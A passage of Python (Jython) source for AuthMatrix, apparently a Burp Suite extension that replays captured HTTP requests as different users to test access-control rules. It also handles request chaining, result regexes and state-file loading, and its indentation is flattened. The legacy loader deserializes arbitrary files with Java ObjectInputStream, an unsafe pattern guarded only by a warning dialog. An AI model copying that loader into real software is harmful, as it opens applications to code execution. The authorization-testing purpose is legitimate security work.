This action may pose a security threat to the application.
Only proceed when the source and contents of this file is trusted.
Load Selected File?
"""
result = JOptionPane.showOptionDialog(self._splitpane,
warning, "Caution",
JOptionPane.YES_NO_OPTION,
JOptionPane.WARNING_MESSAGE,
None,
["OK", "Cancel"],
"OK")
if result != JOptionPane.YES_OPTION:
return
self._db.loadLegacy(fileName,self)
else:
self._db.loadJson(jsonText,self)
# TODO currently can load exention settings, but this is saved for Burp and not for the Project specifically
# self._db.loadJson(self._callbacks.loadExtensionSetting("AUTHMATRIX"),self)
self._userTable.redrawTable()
self._messageTable.redrawTable()
self._chainTable.redrawTable()
def clearClick(self,e):
result = JOptionPane.showConfirmDialog(self._splitpane, "Clear AuthMatrix Configuration?", "Clear Config", JOptionPane.YES_NO_OPTION)
if result == JOptionPane.YES_OPTION:
self._db.clear()
self._tabs.removeAll()
self._userTable.redrawTable()
self._messageTable.redrawTable()
self._chainTable.redrawTable()
def runClick(self,e):
t = Thread(target=self.runMessagesThread)
self._tabs.removeAll()
t.start()
def changeRegexPopup(self):
regexComboBox = JComboBox(self._db.arrayOfRegexes)
regexComboBox.setEditable(True)
failureModeCheckbox = JCheckBox()
panel = JPanel(GridBagLayout())
gbc = GridBagConstraints()
gbc.anchor = GridBagConstraints.WEST
firstline = JPanel()
firstline.add(JLabel("Select a Regex for all selected Requests:"))
secondline = JPanel()
secondline.add(regexComboBox)
thirdline = JPanel()
thirdline.add(failureModeCheckbox)
thirdline.add(JLabel("Regex Detects Unauthorized Requests (Failure Mode)"))
gbc.gridy = 0
panel.add(firstline,gbc)
gbc.gridy = 1
panel.add(secondline, gbc)
gbc.gridy = 2
panel.add(thirdline, gbc)
result = JOptionPane.showConfirmDialog(self._splitpane, panel, "Select Response Regex", JOptionPane.OK_CANCEL_OPTION)
value = regexComboBox.getSelectedItem()
if result == JOptionPane.CANCEL_OPTION or not value:
return None, None
return value, failureModeCheckbox.isSelected()
def changeDomainPopup(self, service):
hostField = JTextField(25)
portField = JTextField(25)
checkbox = JCheckBox()
replaceHostCheckbox = JCheckBox()
replaceHostCheckbox.setSelected(True)
errorField = JLabel("\n")
errorField.setForeground(Color.orange);
errorField.setFont
def isValidDomain(domain):
return re.match(r'^[a-zA-Z0-9-\.]+$', domain)
if service:
hostField.setText(service.getHost())
portField.setText(str(service.getPort()))
if service.getProtocol()=="https":
checkbox.setSelected(True)
class HttpsItemListener(ItemListener):
def itemStateChanged(self, e):
if e.getStateChange() == ItemEvent.SELECTED and portField.getText() == "80":
portField.setText("443")
elif e.getStateChange() == ItemEvent.DESELECTED and portField.getText() == "443":
portField.setText("80")
checkbox.addItemListener(HttpsItemListener())
class HostDocumentListener(DocumentListener):
def changeUpdate(self, e):
self.testHost()
def removeUpdate(self, e):
self.testHost()
def insertUpdate(self, e):
self.testHost()
def testHost(self):
domain = hostField.getText()
matches = isValidDomain(domain)
if not matches:
# NOTE Hacky way to fix layout when host is long
if len(domain)>40:
domain = domain[:40]+"..."
errorField.setText("Invalid host: "+domain)
else:
errorField.setText("\n")
hostField.getDocument().addDocumentListener(HostDocumentListener())
domainPanel = JPanel(GridBagLayout())
gbc = GridBagConstraints()
gbc.anchor = GridBagConstraints.WEST
firstline = JPanel()
firstline.add(JLabel("Specify the details of the server to which the request will be sent."))
secondline = JPanel()
secondline.add(JLabel("Host: "))
secondline.add(hostField)
thirdline = JPanel()
thirdline.add(JLabel("Port: "))
thirdline.add(portField)
fourthline = JPanel()
fourthline.add(checkbox)
fourthline.add(JLabel("Use HTTPS"))
fifthline = JPanel()
fifthline.add(replaceHostCheckbox)
fifthline.add(JLabel("Replace Host in HTTP header"))
sixthline = JPanel()
sixthline.add(errorField)
gbc.gridy = 0
domainPanel.add(firstline,gbc)
gbc.gridy = 1
domainPanel.add(secondline, gbc)
gbc.gridy = 2
domainPanel.add(thirdline, gbc)
gbc.gridy = 3
domainPanel.add(fourthline, gbc)
gbc.gridy = 4
domainPanel.add(fifthline, gbc)
gbc.gridy = 5
domainPanel.add(sixthline, gbc)
result = JOptionPane.showConfirmDialog(
self._splitpane,domainPanel, "Configure target details", JOptionPane.OK_CANCEL_OPTION)
cancelled = (result == JOptionPane.CANCEL_OPTION)
if cancelled or not isValidDomain(hostField.getText()):
return (False, None, None, False, False)
return (True, hostField.getText(), portField.getText(), checkbox.isSelected(), replaceHostCheckbox.isSelected())
##
## Methods for running messages and analyzing results
##
def lockButtons(self, running=True):
# Disable run button, enable cancel button
self._runButton.setEnabled(not running)
self._newUserButton.setEnabled(not running)
self._newRoleButton.setEnabled(not running)
self._newHeaderButton.setEnabled(not running)
self._newChainButton.setEnabled(not running)
self._newStaticValueButton.setEnabled(not running)
self._saveButton.setEnabled(not running)
self._loadButton.setEnabled(not running)
self._clearButton.setEnabled(not running)
self._cancelButton.setEnabled(running)
def runMessagesThread(self, messageIndexes=None):
self._db.lock.acquire()
try:
self.lockButtons()
self._runCancelled=False
# Update original requests with any user changes
self._messageTable.updateMessages()
self._db.clearAllChainResults()
indexes = messageIndexes
if not indexes:
indexes = self._db.getActiveMessageIndexes()
self.clearColorResults(indexes)
# Run in order of row, not by index
messagesThatHaveRun = []
for message in self._db.getMessagesInOrderByRow():
# Only run if message is in the selected indexes (NOTE: dependencies will be run even if not selected)
if message._index in indexes:
messagesThatHaveRun = self.runMessageAndDependencies(message._index, messagesThatHaveRun, [])
except:
traceback.print_exc(file=self._callbacks.getStderr())
finally:
self.lockButtons(False)
self._db.lock.release()
self._messageTable.redrawTable()
def runMessageAndDependencies(self, messageIndex, messagesThatHaveRun, recursionCheckArray):
messageEntry = self._db.arrayOfMessages[messageIndex]
updatedMessagesThatHaveRun = messagesThatHaveRun[:]
updatedRecursionCheckArray = recursionCheckArray[:]
if messageIndex in updatedRecursionCheckArray:
print "Error: Recursion detected in message chains: "+"->".join([str(i) for i in updatedRecursionCheckArray])+"->"+str(messageIndex)
elif (messageIndex not in updatedMessagesThatHaveRun
and messageEntry.isEnabled()
and messageIndex in self._db.getActiveMessageIndexes()):
updatedRecursionCheckArray.append(messageIndex)
for chainIndex in self._db.getActiveChainIndexes():
# Run any dependencies first
chainEntry = self._db.arrayOfChains[chainIndex]
if (messageIndex in chainEntry.getToIDRange()
and chainEntry.isEnabled()
and str(chainEntry._fromID).isdigit()
and int(chainEntry._fromID) >= 0):
updatedMessagesThatHaveRun = self.runMessageAndDependencies(int(chainEntry._fromID), updatedMessagesThatHaveRun, updatedRecursionCheckArray)
self.runMessage(messageIndex)
# print messageIndex
updatedMessagesThatHaveRun.append(messageIndex)
return updatedMessagesThatHaveRun
def runMessage(self, messageIndex):
# NOTE: this uses hacky threading tricks for handling timeouts
tempRequestResponse = []
index = 0
def loadRequestResponse(index, service, message):
# NOTE: tempRequestResponse is an array because of a threading issue,
# where if this thread times out, it will still update temprequestresponse later on..
try:
tempRequestResponse[index] = self._callbacks.makeHttpRequest(service,message)
except java.lang.RuntimeException:
# Catches if there is a bad host
# TODO there may sometimes be an unhandled exception thrown in the stack trace here?
print "Runtime Exception"
return
except:
traceback.print_exc(file=callbacks.getStderr())
messageEntry = self._db.arrayOfMessages[messageIndex]
messageEntry.clearResults()
messageInfo = messageEntry._requestResponse
requestInfo = self._helpers.analyzeRequest(messageInfo)
reqBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
for userIndex in [userEntry._index for userEntry in self._db.getUsersInOrderByRow()]:
# Handle cancel button early exit here
if self._runCancelled:
return
userEntry = self._db.arrayOfUsers[userIndex]
# Only run if the user is enabled
if userEntry.isEnabled():
newHeaders = ModifyMessage.getNewHeaders(requestInfo, userEntry._cookies, userEntry._headers)
newBody = reqBody
# Replace with Chain
for toValue, chainIndex in userEntry.getChainResultByMessageIndex(messageIndex):
# Add transformers
chain = self._db.arrayOfChains[chainIndex]
toValue = chain.transform(toValue, self._callbacks)
toRegex = chain._toRegex
newBody = StringUtil.toBytes(ModifyMessage.chainReplace(toRegex,toValue,[StringUtil.fromBytes(newBody)])[0])
newHeaders = ModifyMessage.chainReplace(toRegex,toValue,newHeaders)
# Replace with SV
# toValue = SV, toRegex = toRegex
for chain in [self._db.arrayOfChains[i] for i in self._db.getActiveChainIndexes()]:
svName = chain.getSVName()
# If the Chain Source exists, and this message is affected, and the chain is enabled
if svName and messageIndex in chain.getToIDRange() and chain.isEnabled():
# get toValue for correct source
sourceUser = chain._sourceUser if chain._sourceUser>=0 else userIndex
# Check that sourceUser is active
if sourceUser in self._db.getActiveUserIndexes():
toValue = self._db.getSVByName(svName).getValueForUserIndex(sourceUser)
# Add transformers
toValue = chain.transform(toValue, self._callbacks)
toRegex = chain._toRegex
newBody = StringUtil.toBytes(ModifyMessage.chainReplace(toRegex,toValue,[StringUtil.fromBytes(newBody)])[0])
newHeaders = ModifyMessage.chainReplace(toRegex,toValue,newHeaders)
# Replace Custom Special Types (i.e. Random)
newBody = StringUtil.toBytes(ModifyMessage.customReplace([StringUtil.fromBytes(newBody)])[0])
newHeaders = ModifyMessage.customReplace(newHeaders)
# Construct and send a message with the new headers
message = self._helpers.buildHttpMessage(newHeaders, newBody)
# Run with threading to timeout correctly
tempRequestResponse.append(None)
t = Thread(target=loadRequestResponse, args = [index,messageInfo.getHttpService(),message])
t.start()
t.join(self._db.LOAD_TIMEOUT)
# Create default requestResponse without response
requestResponse = RequestResponseStored(self,
request=message,
httpService=messageInfo.getHttpService())
if t.isAlive():
print "ERROR: Request Timeout for Request #"+str(messageIndex)+" and User #"+str(userIndex)
elif tempRequestResponse[index]:
requestResponse = RequestResponseStored(self,requestResponse=tempRequestResponse[index])
messageEntry.addRunByUserIndex(userIndex, requestResponse)
# Get Chain Result
response = requestResponse.getResponse()
if not response:
print "ERROR: No HTTP Response for Request #"+str(messageIndex)+" and User #"+str(userIndex)
else:
response = StringUtil.fromBytes(response)
for chain in [self._db.arrayOfChains[c] for c in self._db.getActiveChainIndexes()]:
# This wont have issues with SV because of the prefix never matching the index
if str(chain._fromID) == str(messageIndex) and chain.isEnabled():
# If a sourceUser is set, replace for all users' chain results
# Else, replace each user's chain results individually
replace = True
affectedUsers = [userEntry]
if str(chain._sourceUser).isdigit() and chain._sourceUser >= 0: # TODO (0.9): why .isdigit()? Can this line just be removed
if str(chain._sourceUser) == str(userIndex):
affectedUsers = self._db.getUsersInOrderByRow()
else:
replace = False
if replace:
result = ""
if chain._fromRegex:
match = re.search(chain._fromRegex, response, re.DOTALL)
if match and len(match.groups()):
result = match.group(1)
for toID in chain.getToIDRange():
for affectedUser in affectedUsers:
affectedUser.addChainResultByMessageIndex(toID, result, chain._index)
index +=1
# Grab all active roleIndexes that are checkboxed
activeCheckBoxedRoles = [index for index in messageEntry._roles.keys() if messageEntry._roles[index] and not self._db.arrayOfRoles[index].isDeleted()]
# Check Role Results of message
for roleIndex in self._db.getActiveRoleIndexes():
expectedResult = self.checkResult(messageEntry, roleIndex, activeCheckBoxedRoles)
messageEntry.setRoleResultByRoleIndex(roleIndex, expectedResult)
def clearColorResults(self, messageIndexArray = None):
if not messageIndexArray:
messageIndexes = self._db.getActiveMessageIndexes()
else:
messageIndexes = messageIndexArray
for messageIndex in messageIndexes:
messageEntry = self._db.arrayOfMessages[messageIndex]
messageEntry.clearResults()
self._messageTable.redrawTable()
def checkResult(self, messageEntry, roleIndex, activeCheckBoxedRoles):
for userEntry in self._db.getUsersInOrderByRow():
ignoreUser = False
# NOTE: When using failure regex, all users not in a checked role must see that regex
# if user is not in this role, ignore it
if not userEntry._roles[roleIndex]:
ignoreUser = True
elif not userEntry.isEnabled():
ignoreUser = True
else:
# If user is in any other checked role, then ignore it
for index in self._db.getActiveRoleIndexes():
if not index == roleIndex and userEntry._roles[index]:
if index in activeCheckBoxedRoles:
ignoreUser = True
if not ignoreUser:
if not userEntry._index in messageEntry._userRuns:
print ("Unexpected Error: Results not found for Request #"
+ str(messageEntry._index) + " and User #" + str(userEntry._index))
return False
requestResponse = messageEntry._userRuns[userEntry._index]
response = requestResponse.getResponse()
if not response:
# No Response: default to failed
return False
resp = StringUtil.fromBytes(response)
found = re.search(messageEntry._regex, resp, re.DOTALL)
roleChecked = roleIndex in activeCheckBoxedRoles
shouldSucceed = not roleChecked if messageEntry.isFailureRegex() else roleChecked
succeeds = found if shouldSucceed else not found
if not succeeds:
return False
return True
##
## Static methods to modify requests during runs
##
class ModifyMessage():
@staticmethod
def cookieReplace(oldCookieStr, newCookieStr):
previousCookies = oldCookieStr.replace(" ","").split(";")
newCookies = newCookieStr.replace(" ","").split(";")
newCookieVariableNames = []
for newCookie in newCookies:
# If its a valid cookie
equalsToken = newCookie.find("=")
if equalsToken >= 0:
newCookieVariableNames.append(newCookie[0:equalsToken+1])
# Add all the old unchanged cookies
for previousCookie in previousCookies:
# If its a valid cookie
equalsToken = previousCookie.find("=")
if equalsToken >= 0:
if previousCookie[0:equalsToken+1] not in newCookieVariableNames:
newCookies.append(previousCookie)
# Remove whitespace
newCookies = [x for x in newCookies if x]
return "; ".join(newCookies)
# Replaces headers/cookies with user's token
@staticmethod
def getNewHeaders(requestInfo, newCookieStr, newHeaders):
ret = requestInfo.getHeaders()
headers = requestInfo.getHeaders()
# Handle Cookies
if newCookieStr:
replaceIndex = -1
cookieHeader = "Cookie:"
oldCookieStr = ""
# Find existing cookie header
for i in range(headers.size()):
header = headers[i]
if str(header).startswith(cookieHeader):
replaceIndex = i
oldCookieStr = str(header)[len(cookieHeader):]
newCookiesHeader = cookieHeader+" "+ModifyMessage.cookieReplace(oldCookieStr,newCookieStr)
if replaceIndex >= 0:
ret.set(replaceIndex, newCookiesHeader)
else:
ret.add(newCookiesHeader)
# Handle Custom Header
for newHeader in [x for x in newHeaders if x]:
replaceIndex = -1
colon = newHeader.find(":")
if colon >= 0:
for i in range(headers.size()):
header = headers[i]
# If the header already exists, remove it
if str(header).startswith(newHeader[0:colon+1]):
replaceIndex = i
if replaceIndex >= 0:
ret.set(replaceIndex, newHeader)
else:
ret.add(newHeader)
return ret
@staticmethod
def chainReplace(toRegex, toValue, toArray):
# TODO clean up so that the input is headers+body and its called only once
isBody = len(toArray)==1
if toRegex:
# BUG FIX: Geoff reported that if the regex ends at the newline on the last header,
# the regex fails. Hacky solution is to add an extra newlines before the regex search
# and remove it after.
to = "\r\n".join(toArray)+"\r\n\r\n"
match = re.search(toRegex, to, re.DOTALL)
if match and len(match.groups()):
ret = (to[0:match.start(1)]+toValue+to[match.end(1):])
if ret[-4:] == "\r\n\r\n":
ret = ret[:-4]
if isBody:
return [ret]
else:
return ret.split("\r\n")
return toArray
## Method to replace custom special types in messages
@staticmethod
def customReplace(toArray):
ret = ArrayList()
customPrefix = "#{AUTHMATRIX:"
for to in toArray:
toNew = to
if customPrefix in to:
if customPrefix+"RANDOM}" in to:
# This will produce a random 4 char numeric string
# Most common use case is for APIs that reject requests that are identical to a previous request
randomString = ''.join(random.choice(string.digits) for _ in range(4))
toNew = to.replace(customPrefix+"RANDOM}",randomString)
ret.add(toNew)
return ret
##
## DB Class that holds all configuration data
##
class MatrixDB():
def __init__(self):
# Holds all custom data
# NOTE: consider moving these constants to a different class
self.STATIC_USER_TABLE_COLUMN_COUNT = 2
self.STATIC_MESSAGE_TABLE_COLUMN_COUNT = 3
self.STATIC_CHAIN_TABLE_COLUMN_COUNT = 7
self.LOAD_TIMEOUT = 10.0
self.BURP_ORANGE = Color(0xff6633)
self.lock = Lock()
self.arrayOfMessages = ArrayList()
self.arrayOfRoles = ArrayList()
self.arrayOfUsers = ArrayList()
self.arrayOfChains = ArrayList()
self.deletedUserCount = 0
self.deletedRoleCount = 0
self.deletedMessageCount = 0
self.deletedChainCount = 0
self.arrayOfSVs = ArrayList()
self.headerCount = 0
self.arrayOfRegexes = []
# Returns the index of the user, whether its new or not
def getOrCreateUser(self, name):
self.lock.acquire()
userIndex = -1
# Check if User already exits
for i in self.getActiveUserIndexes():
if self.arrayOfUsers[i]._name == name:
userIndex = i
# Add new User
if userIndex < 0:
userIndex = self.arrayOfUsers.size()
self.arrayOfUsers.add(UserEntry(userIndex,
userIndex - self.deletedUserCount,
name,
headers=[""]*self.headerCount))
# Add SingleUser Role
self.lock.release()
singleRoleIndex = self.getOrCreateRole(name, True)
self.lock.acquire()
# Check Role for user
# Add all existing roles as unchecked except the singleUser
for roleIndex in self.getActiveRoleIndexes():
prechecked=False
if roleIndex == singleRoleIndex:
prechecked=True
self.arrayOfUsers[userIndex].addRoleByIndex(roleIndex,prechecked)
self.lock.release()
return userIndex
# Returns the index of the role, whether its new or not
def getOrCreateRole(self, role, newSingleUser=False):
self.lock.acquire()
roleIndex = -1
suffix = " (only)"
name = role+suffix if newSingleUser else role
if newSingleUser or name.endswith(suffix):
singleUser = True
else:
singleUser = False
# Check if Role already exists
for i in self.getActiveRoleIndexes():
if self.arrayOfRoles[i]._name == name:
roleIndex = i
# Add new Role
if roleIndex < 0:
roleIndex = self.arrayOfRoles.size()
newColumn = roleIndex-self.deletedRoleCount
# Insert column if not singleuser and increment singleuser columns
if not singleUser:
newColumn -= self.getActiveSingleUserRoleCount()
for i in self.getActiveSingleUserRoleIndexes():
# NOTE this must be changed if reordering of roles is added
curColumn = self.arrayOfRoles[i].getColumn()
assert(curColumn >= newColumn)
self.arrayOfRoles[i].setColumn(curColumn+1)
self.arrayOfRoles.add(RoleEntry(roleIndex,
newColumn,
name,
singleUser=singleUser))
# Add new role to each existing user as unchecked except the singleUser
for userIndex in self.getActiveUserIndexes():
prechecked = False
if singleUser and self.arrayOfUsers[userIndex]._name == name[:-len(suffix)]:
prechecked=True
self.arrayOfUsers[userIndex].addRoleByIndex(roleIndex, prechecked)
# Add new role to each existing message as unchecked
for messageIndex in self.getActiveMessageIndexes():
self.arrayOfMessages[messageIndex].addRoleByIndex(roleIndex)
self.lock.release()
return roleIndex
# Returns the Row of the new message
# Unlike Users and Roles, allow duplicate messages
def createNewMessage(self,messagebuffer,name,regex):
self.lock.acquire()
messageIndex = self.arrayOfMessages.size()
self.arrayOfMessages.add(MessageEntry(messageIndex, messageIndex - self.deletedMessageCount, messagebuffer, name, regex=regex))
# Add all existing roles as unchecked
for roleIndex in self.getActiveRoleIndexes():
self.arrayOfMessages[messageIndex].addRoleByIndex(roleIndex)
# Add regex to array if its new
if regex and regex not in self.arrayOfRegexes:
self.arrayOfRegexes.append(regex)
self.lock.release()
return messageIndex
def createNewChain(self):
self.lock.acquire()
chainIndex = self.arrayOfChains.size()
# Handle Example
if chainIndex == 0:
self.arrayOfChains.add(ChainEntry(
chainIndex,
chainIndex - self.deletedChainCount,
"Example",
"",
"StartAfter(.*?)EndAt",
"",
"StartAfter(.*?)EndAt"))
else:
self.arrayOfChains.add(ChainEntry(chainIndex, chainIndex - self.deletedChainCount))
self.lock.release()
return chainIndex
def clear(self):
self.lock.acquire()
self.arrayOfMessages = ArrayList()
self.arrayOfRoles = ArrayList()
self.arrayOfUsers = ArrayList()
self.arrayOfChains = ArrayList()
self.deletedUserCount = 0
self.deletedRoleCount = 0
self.deletedMessageCount = 0
self.deletedChainCount = 0
self.arrayOfSVs = ArrayList()
self.headerCount = 0
self.arrayOfRegexes = []
self.lock.release()
def loadLegacy(self, fileName, extender):
from java.io import ObjectOutputStream;
from java.io import FileOutputStream;
from java.io import ObjectInputStream;
from java.io import FileInputStream;
FAILURE_REGEX_SERIALIZE_CODE = "|AUTHMATRIXFAILUREREGEXPREFIX|"
AUTHMATRIX_SERIALIZE_CODE = "|AUTHMATRIXCOOKIEHEADERSERIALIZECODE|"
ins = ObjectInputStream(FileInputStream(fileName))
db=ins.readObject()
ins.close()
self.lock.acquire()
self.arrayOfUsers = ArrayList()
self.arrayOfRoles = ArrayList()
self.arrayOfMessages = ArrayList()
self.arrayOfChains = ArrayList()
self.deletedUserCount = db.deletedUserCount
self.deletedRoleCount = db.deletedRoleCount
self.deletedMessageCount = db.deletedMessageCount
self.deletedChainCount = 0 # Updated with chain entries below in arrayOfUsers
self.arrayOfSVs = ArrayList()
self.headerCount = 1 # Legacy states had one header only
self.arrayOfRegexes = []
for message in db.arrayOfMessages:
if message._successRegex.startswith(FAILURE_REGEX_SERIALIZE_CODE):
regex = message._successRegex[len(FAILURE_REGEX_SERIALIZE_CODE):]
failureRegexMode=True
else:
regex = message._successRegex
failureRegexMode=False
messageEntry = RequestResponseStored(extender, message._host, message._port, message._protocol, message._requestData)
self.arrayOfMessages.add(MessageEntry(
message._index,
message._tableRow,
messageEntry,
message._name, message._roles, regex, message._deleted, failureRegexMode))
for role in db.arrayOfRoles:
self.arrayOfRoles.add(RoleEntry(
role._index,
role._mTableColumn-3, # NOTE this is done to preserve compatability with older state files
role._name,
role._deleted))
for user in db.arrayOfUsers:
# NOTE to preserve backwords compatability, chains are stored here in a really hacky way
if type(user._roles) == int:
# Chain
self.deletedChainCount = user._roles
name=""
sourceUser=""
if user._name:
namesplit = user._name.split(AUTHMATRIX_SERIALIZE_CODE)
name=namesplit[0]
if len(namesplit)>1:
sourceUser=namesplit[1]
token = user._token.split(AUTHMATRIX_SERIALIZE_CODE)
assert(len(token)==2)
fromID = token[0]
fromRegex = token[1]
staticcsrf = user._staticcsrf.split(AUTHMATRIX_SERIALIZE_CODE)
assert(len(staticcsrf)==2)
toID = staticcsrf[0]
toRegex = staticcsrf[1]
self.arrayOfChains.add(ChainEntry(
int(user._index),
int(user._tableRow),
name,
fromID,
fromRegex,
toID,
toRegex,
user._deleted,
sourceUser
))
else:
# Normal User
token = [""] if not user._token else user._token.split(AUTHMATRIX_SERIALIZE_CODE)
cookies = token[0]
header = "" if len(token)==1 else token[1]
name = "" if not user._name else user._name
self.arrayOfUsers.add(UserEntry(
int(user._index),
int(user._tableRow),
name,
user._roles,
user._deleted,
cookies,
headers=[header]))
self.lock.release()
def loadJson(self, jsonText, extender):
# NOTE: Weird issue where saving serialized json for configs loaded from old states (pre v0.6.3)
# doesn't use correct capitalization on bools.
# This replacement might have weird results, but most are mitigated by using base64 encoding
jsonFixed = jsonText.replace(": False",": false").replace(": True",": true")
# Get Rid of comments
jsonFixed = re.sub(r"[/][*]([^*]|([*][^/]))*[*][/]", "", jsonFixed, 0, re.MULTILINE)
try:
stateDict = json.loads(jsonFixed)
except:
print jsonFixed
traceback.print_exc(file=extender._callbacks.getStderr())
return
version = stateDict["version"]
if version > AUTHMATRIX_VERSION:
print "Invalid Version in State File ("+version+")"
return
backupState = self.getSaveableJson()
self.lock.acquire()
try:
# NOTE: As of 0.8, If the state file is missing an element, then it assumes it is
# the intention of the user to not modify that array, so that just small bits can be updated.
# NOTE: As of 0.8 the deleted counts and header counts are filled in using the values found in each array
# TODO (0.9): every field that has "{int(x" is using an ID in the state that is not obvious to the user
if "arrayOfRoles" in stateDict:
self.arrayOfRoles = ArrayList()
self.deletedRoleCount = 0
# (self,index,columnIndex,name,deleted=False,singleUser=False):
for roleEntry in stateDict["arrayOfRoles"]:
deleted = False if "deleted" not in roleEntry else roleEntry["deleted"]
if deleted:
self.deletedRoleCount += 1
self.arrayOfRoles.add(RoleEntry(
roleEntry["index"],
roleEntry["column"],
roleEntry["name"],
deleted = deleted,
singleUser = False if version < "0.7" or "singleUser" not in roleEntry else roleEntry["singleUser"]
))
if "arrayOfUsers" in stateDict:
self.arrayOfUsers = ArrayList()
self.deletedUserCount = 0
self.headerCount = 0
self.arrayOfSVs = ArrayList()
# NOTE: leaving out chainResults
# (self, index, tableRow, name, roles = {}, deleted=False, cookies="", headers = [], enabled = True):
for userEntry in stateDict["arrayOfUsers"]:
deleted = False if "deleted" not in userEntry else userEntry["deleted"]
if deleted:
self.deletedUserCount += 1
# Suppport old and new header versions
if "headersBase64" in userEntry:
headers = [base64.b64decode(x) for x in userEntry["headersBase64"]]
# Grab the number of headers. Sanity check will later confirm that each user has the right number of headers
if self.headerCount == 0:
self.headerCount = len(headers)
elif "headerBase64" in userEntry:
self.headerCount = 1
headers = [base64.b64decode(userEntry["headerBase64"])]
else:
headers = [""]*self.headerCount
self.arrayOfUsers.add(UserEntry(
userEntry["index"],
userEntry["tableRow"],
userEntry["name"],
{int(x): userEntry["roles"][x] for x in userEntry["roles"].keys()}, # convert keys to ints
deleted = deleted,
cookies = "" if "cookiesBase64" not in userEntry else base64.b64decode(userEntry["cookiesBase64"]),
headers = headers,
enabled = True if "enabled" not in userEntry else userEntry["enabled"]
))
# Update Static Values
keyword = "arrayOfChainSources" if version >= "0.8" else "arrayOfSVs"
if keyword in stateDict:
for svEntry in stateDict[keyword]:
# If the index does not match an active users, do not include it
self.arrayOfSVs.add(SVEntry(
svEntry["name"],
{int(x): svEntry["userValues"][x] for x in svEntry["userValues"].keys() if int(x) in self.getActiveUserIndexes()}, # convert keys to ints
))
if "arrayOfMessages" in stateDict:
self.arrayOfMessages = ArrayList()
self.deletedMessageCount = 0
self.arrayOfRegexes = []
# NOTE leaving out roleResults and userRuns (need to convert keys)
# (self, index, tableRow, requestResponse, name = "", roles = {}, regex = "", deleted = False, failureRegexMode = False, enabled = True):
for messageEntry in stateDict["arrayOfMessages"]:
deleted = False if "deleted" not in messageEntry else messageEntry["deleted"]
if deleted:
self.deletedMessageCount += 1
regex = "" if "regexBase64" not in messageEntry else base64.b64decode(messageEntry["regexBase64"]).decode("utf-8")
if regex and regex not in self.arrayOfRegexes:
self.arrayOfRegexes.append(regex)
requestResponse = None if deleted else RequestResponseStored(
extender,
messageEntry["host"],
messageEntry["port"],
messageEntry["protocol"],
StringUtil.toBytes((base64.b64decode(messageEntry["requestBase64"])).decode("utf-8")))
self.arrayOfMessages.add(MessageEntry(
messageEntry["index"],
messageEntry["tableRow"],
requestResponse,
messageEntry["name"],
{int(x): messageEntry["roles"][x] for x in messageEntry["roles"].keys()}, # convert keys to ints
regex = regex,
deleted = deleted,
failureRegexMode = False if "failureRegexMode" not in messageEntry else messageEntry["failureRegexMode"],
enabled = True if "enabled" not in messageEntry else messageEntry["enabled"]
))
if "arrayOfChains" in stateDict:
self.arrayOfChains = ArrayList()
self.deletedChainCount = 0
# NOTE: leaving out fromStart, fromEnd, toStart, toEnd
for chainEntry in stateDict["arrayOfChains"]:
deleted = False if "deleted" not in chainEntry else chainEntry["deleted"]
if deleted:
self.deletedChainCount += 1
self.arrayOfChains.add(ChainEntry(
chainEntry["index"],
chainEntry["tableRow"],
name = "" if "name" not in chainEntry else chainEntry["name"],
fromID = "" if "fromID" not in chainEntry else chainEntry["fromID"],
fromRegex = "" if "fromRegexBase64" not in chainEntry else base64.b64decode(chainEntry["fromRegexBase64"]).decode("utf-8"),
toID = "" if "toID" not in chainEntry else chainEntry["toID"],
toRegex = "" if "toRegexBase64" not in chainEntry else base64.b64decode(chainEntry["toRegexBase64"]).decode("utf-8"),
deleted = deleted,
sourceUser = -1 if "sourceUser" not in chainEntry else chainEntry["sourceUser"],
enabled = True if "enabled" not in chainEntry else chainEntry["enabled"],
transformers = [] if "transformers" not in chainEntry else chainEntry["transformers"]
))
except:
self.lock.release()
print "Corrupt State File: Reverting back to original. (See stderr for more detail)"
traceback.print_exc(file=extender._callbacks.getStderr())
self.loadJson(backupState,extender)
return
self.lock.release()
# Sanity checks
sanityResult = self.sanityCheck(extender)
if sanityResult:
print "Error parsing state file: "+sanityResult
# Revert to the backup state
self.loadJson(backupState,extender)
def sanityCheck(self, extender):
try:
# Returns an error string if the DB is in a corrupt state, else returns None
userIndexes = self.getActiveUserIndexes()
roleIndexes = self.getActiveRoleIndexes()
messageIndexes = self.getActiveMessageIndexes()
chainIndexes = self.getActiveChainIndexes()
# Index Checks
for indexes, currentArray, deletedCount in [
(userIndexes, self.arrayOfUsers, self.deletedUserCount),
(roleIndexes, self.arrayOfRoles, self.deletedRoleCount),
(messageIndexes, self.arrayOfMessages, self.deletedMessageCount),
(chainIndexes, self.arrayOfChains, self.deletedChainCount)]:
# Check that indexes are all unique
if len(indexes) > len(set(indexes)):
return "Not All Indexes are Unique."
# Check that the DB array has the correct number of items
if len(currentArray) != len(indexes) + deletedCount:
return "Array found with incorrect number of items."
for currentIndex in indexes:
if currentIndex < 0:
return "Negative Index Found."
# Check that all index values are below the length of active+deleted
if currentIndex >= len(indexes)+deletedCount:
return "Index Higher than Total Active + Deleted."
# Check that the indexes within the array match the index of the Entry
if currentIndex != currentArray[currentIndex]._index:
return "Entries in the State File Arrays must be in order by index"
# Row Checks
for indexes, currentArray in [
(userIndexes, self.arrayOfUsers),
(messageIndexes, self.arrayOfMessages),
(chainIndexes, self.arrayOfChains)]:
rowList = [currentArray[currentIndex].getTableRow() for currentIndex in indexes]
# Check that the rows for a given table are all unique
if len(rowList) > len(set(rowList)):
return "Not all rows for a given table are unique."
for row in rowList:
# Check that rows are within appropriate bounds
if row >= len(indexes) or row <0:
return "Row out of bounds."
# Column Checks
columnList = [self.arrayOfRoles[currentIndex].getColumn() for currentIndex in roleIndexes]
if len(columnList) > len(set(columnList)):
return "Not all columns for Roles array are unique."
for column in columnList:
if column < 0 or column >= len(roleIndexes):
return "Column out of bounds."
# Custom Headers checks
for userIndex in userIndexes:
if len(self.arrayOfUsers[userIndex]._headers) != self.headerCount:
return "Incorrect Number of Headers for a User. Must be "+str(self.headerCount)
# Role Assignment Checks
for indexes, currentArray in [
(userIndexes, self.arrayOfUsers),
(messageIndexes, self.arrayOfMessages)]:
for index in indexes:
# Check that all keys are unique (might be redundant)
roleKeys = currentArray[index]._roles.keys()
if len(roleKeys) > len(set(roleKeys)):
return "Duplicate Keys on Roles Map"
# Check that all active roles are covered in that items map
for roleIndex in roleIndexes:
if roleIndex not in roleKeys:
return "Missing a Role Value in a Message or User"
# NOTE: Skipping Static Value check because a missing SV is handled gracefully
# TODO (0.9): check fromID and sourceUser in Chain
except:
traceback.print_exc(file=extender._callbacks.getStderr())
